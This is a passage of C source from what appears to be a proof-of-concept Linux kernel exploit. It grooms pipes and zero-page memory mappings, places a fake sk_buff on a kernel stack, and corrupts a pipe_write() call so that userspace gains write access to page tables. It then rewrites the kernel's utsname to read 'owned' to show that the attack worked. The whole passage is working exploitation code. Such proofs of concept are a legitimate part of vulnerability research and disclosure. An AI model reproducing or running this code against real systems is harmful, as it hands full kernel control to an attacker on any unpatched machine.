  SYSCHK(write(addr_leak_pipe[1], dummy_2pages, 0x1000));
  // then clear the pipe, saving the overflow page as the new tmp_page
  SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x2000));

  printf("preparing gigantic virtual address region full of zeropage mappings, this will take a few seconds... ");
  mprotect_region_size = 64UL * 1024 * 1024 * 1024; // 64GiB virtual size, 128MiB of last-level page table memory
  mprotect_region = SYSCHK(mmap(NULL, mprotect_region_size+0x1ff000, PROT_READ|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_NORESERVE, -1, 0));
  // align to page table boundary
  mprotect_region = (void*)(((unsigned long)mprotect_region+0x1ff000) & ~0x1ff000UL);
  // make sure the VMA is not merged with adjacent ones
  SYSCHK(madvise(mprotect_region, mprotect_region_size, MADV_RANDOM));
  // fill it with zeropage PTEs (the slow part, may take 10 or 20 seconds)
  for (unsigned long i = 0; i < mprotect_region_size; i += 0x200000) {
    SYSCHK(madvise(mprotect_region+i+0x1000, 0x1000, MADV_NORMAL)); /* split VMA to prevent THP */
    for (unsigned long j = i; j < i + 0x200000; j += 0x1000)
      *(volatile char *)(mprotect_region+j);
    SYSCHK(madvise(mprotect_region+i+0x1000, 0x1000, MADV_RANDOM)); /* merge VMAs back into one */
  }

  // temporarily make the first four pages writable, then merge them back together into the original VMA
  SYSCHK(mprotect(mprotect_region, 0x4000, PROT_READ|PROT_WRITE));
  *(unsigned long *)(mprotect_region + 0x0000) = 0;
  *(unsigned long *)(mprotect_region + 0x1000) = 0;
  // crafted PTE
  *(unsigned long *)(mprotect_region + 0x3000) = 0x7/*present+writable+user*/ | (overflowing_page_va+0x1000 - page_offset_base);
  SYSCHK(mprotect(mprotect_region, 0x4000, PROT_READ|PROT_EXEC));
  printf("done.\n");

  // prepare mprotect thread
  mprotect_launch_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  pthread_t slow_mprotect_thread;
  if (pthread_create(&slow_mprotect_thread, NULL, slow_mprotect_thread_fn, NULL))
    errx(1, "pthread_create");

  // prepare bumper thread before bogothread starts spinning
  bumper_thread_launch_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  pthread_t bumper_thread;
  if (pthread_create(&bumper_thread, NULL, bumper_thread_fn, NULL))
    errx(1, "pthread_create");

  fakeskb_ready_detect_map = SYSCHK(mmap(NULL, 0x3000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0))+0x1000;
  SYSCHK(mprotect(fakeskb_ready_detect_map, 0x1000, PROT_READ));

  char *spinskb_page_u = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  *(volatile char *)spinskb_page_u = 0;
  char *spinskb_page_k = (void*)uvirt_to_kvirt((unsigned long)spinskb_page_u, 0);
  struct skb_shared_info *spin_ssi_u = (void*)spinskb_page_u;
  struct sk_buff *spin_skb_u = (void*)(spinskb_page_u+0x800);
  spin_ssi_u->frag_list = (void*)(spinskb_page_k+0x800);
  spin_skb_u->next = (void*)(spinskb_page_k+0x800);

  // note: bogothread_spray_data is at address 0x...8
  memset(bogothread_spray_data, 'A', sizeof(bogothread_spray_data));
  ((struct sockaddr*)bogothread_spray_data)->sa_family = AF_UNIX;
#define FAKESKB_CONTROL_WINDOW_STARTOFF 0x68
  struct sk_buff *bogothread_stack_fakeskb = (void*)(bogothread_spray_data-FAKESKB_CONTROL_WINDOW_STARTOFF);
  // not setting bogothread_stack_fakeskb->consumed here - it is outside the
  // bounds of bogothread_spray_data and instead comes from the zeroed unused
  // 7th element of the onstack iovec
  bogothread_stack_fakeskb->len = 1234;
  bogothread_stack_fakeskb->data_len = 1234;
  bogothread_stack_fakeskb->unreadable = 0;
  bogothread_stack_fakeskb->end = 0;
  bogothread_stack_fakeskb->head = (void*)spinskb_page_k;

#if 1
  printf("fakeskb:\n");
  hexdump(bogothread_stack_fakeskb, sizeof(*bogothread_stack_fakeskb));
#endif

  printf("getting fakeskb onto target stack: ");
  while (1) {
    SYSCHK(madvise(fakeskb_ready_detect_map, 0x1000, MADV_DONTNEED));

    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fakeskb_stack_spray_socks));
    while (1) {
      int res = send(fakeskb_stack_spray_socks[1], "A", 1, MSG_DONTWAIT);
      if (res == -1)
        break;
    }

    eventfd_write(bogostack_continue_fd, 1);
    /* spin until the cmsg read has started */
    while (1) {
      unsigned char incore;
      SYSCHK(mincore(fakeskb_ready_detect_map, 0x1000, &incore));
      if (incore)
        break;
      usleep(100);
    }

    bool fakeskb_placed_ok = sarb_memeq_checked(bogothread_spray_data, bogostack_top_of_stack-0x1000+TARGET_OBJECT_OFF+FAKESKB_CONTROL_WINDOW_STARTOFF, sizeof(bogothread_spray_data));
    if (fakeskb_placed_ok) {
      printf(" SUCCESS\n");
      printf("telling bumper to start spinning... ");
      SYSCHK(eventfd_write(bumper_thread_launch_fd, 1));
      usleep(100*1000); // note: tick interval is 4ms
      printf("assuming that's done\n");
    } else {
      printf("?");
    }

#if 0
    printf("\nreadback:\n");
    char fakeskb_readback[0x1000];
    sarb_read_checked(fakeskb_readback, bogostack_top_of_stack-0x1000, sizeof(fakeskb_readback));
    hexdump(fakeskb_readback, sizeof(fakeskb_readback));
    getchar();
#endif
    // unblock
    close(fakeskb_stack_spray_socks[0]);
    SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
    close(fakeskb_stack_spray_socks[1]);

    if (fakeskb_placed_ok)
      break;
  }

  printf("getting victim pipe_write() onto target stack: ");
  char *pipe_dummybuf = alloca(pipe_size*0x1000);
  memset(pipe_dummybuf, 'A', pipe_size*0x1000);
  bogostack_want_clobber_target = true;
  while (1) {
    // make the pipe state:
    // <tmp_page> <dummy pages>... <free slot>
    SYSCHK(write(addr_leak_pipe[1], pipe_dummybuf, 0x1000*(pipe_size-1)));

    eventfd_write(bogostack_continue_fd, 1);

    // wait for bogostack thread to enter pipe_write()
    while (1) {
      struct pollfd pollfd = {
        .fd = addr_leak_pipe[1],
        .events = POLLOUT
      };
      int pollres = SYSCHK(poll(&pollfd, 1, 0));
      if (pollres == 0)
        break;
    }

    // Check if the stack is at the expected offset.
    // The basic idea is that a return address pointing behind the call to
    // syscall_exit_to_user_mode in do_syscall_64 indicates the currently live
    // syscall because such a return address will always be overwritten by a
    // subsequent call to syscall_exit_to_user_mode at the end of the syscall.
    unsigned long search_retaddr = SYSMAP__do_syscall_64__RETADDR_FROM__x64_sys_call + kaslr_offset;
    if (sarb_memeq_checked(&search_retaddr, bogostack_top_of_stack-0x1000+TARGET_OBJECT_OFF+0x1e0, 8)) {
      printf(" HIT!\n");
      break;
    }

    // let pipe_write() continue, and wait for it to finish
    SYSCHK(read(addr_leak_pipe[0], pipe_dummybuf, pipe_size*0x1000));
    SYSCHK(read(bogostack_ready_fd, dummy_page, 8));

    // make the pipe empty again, preserving tmp_page
    SYSCHK(read(addr_leak_pipe[0], pipe_dummybuf, 0x2000));

    printf(".");
  }

  SYSCHK(madvise(mprotect_region+0x2000, 0x1000, MADV_DONTNEED));
  SYSCHK(eventfd_write(mprotect_launch_fd, 1));

  usleep(10*1000);

  // Let pipe_write() begin copying into overflowing_page_va.
  SYSCHK(read(addr_leak_pipe[0], dummy_page, 0x1000));

  // wait for pipe_write() to enter page fault handling
  usleep(50*1000);

  // trigger the increment (make bumper stop spinning)
  *(volatile unsigned long *)&spin_skb_u->next = 0;

  // if the corruption worked, bogothread should return out of pipe_write()
  SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
  printf("bogothread left pipe_write()\n");

  printf("checking page table control...\n");
  tlb_flush();

#if 0
  char pt_readback_kdump[0x1000];
  sarb_read_checked(pt_readback_kdump, overflowing_page_va+0x1000, 0x1000);
  printf("mprotect_region:\n");
  hexdump(mprotect_region, 0x4000);
  printf("page table read from kernel memory:\n");
  hexdump(pt_readback_kdump, 0x1000);
#endif

  unsigned long pt_test_readback = *(volatile unsigned long *)(target_page_table_va+0x100800);
  printf("page table readback for self-referential entry: 0x%lx\n", pt_test_readback);

  /*
   * demonstrate page table control by mapping init_uts_ns into userspace and
   * overwriting the "sysname" field
   */
  unsigned long init_uts_ns_addr = SYSMAP__init_uts_ns + kaslr_offset;
  printf("init_uts_ns_addr=0x%lx\n", init_uts_ns_addr);
  printf("trying to overwrite utsname to demonstrate page table control\n");
  *(volatile unsigned long *)(target_page_table_va+0x100808) = anyvirt_to_phys(init_uts_ns_addr) | 0x7/*present+writable+user*/;
  printf("PTE2: 0x%lx\n", *(volatile unsigned long *)(target_page_table_va+0x100808));
  tlb_flush();
#if 0
  printf("crafted mapping contents:\n");
  hexdump((void*)target_page_table_va+0x101000, 0x1000);
#endif
  printf("PTE2: 0x%lx\n", *(volatile unsigned long *)(target_page_table_va+0x100808));

  char *init_uts_ns_mapping = (void*)(target_page_table_va+0x101000+(init_uts_ns_addr&0xfff));
  printf("old data: '%s'\n", init_uts_ns_mapping);
  strcpy(init_uts_ns_mapping, "owned");

  /* remove the page table entries again */
  *(volatile unsigned long *)(target_page_table_va+0x100808) = 0;
  *(volatile unsigned long *)(target_page_table_va+0x100800) = 0;
  tlb_flush();
  printf("done. try running `uname -a` to confirm that the write worked\n");
  exit(0);
}
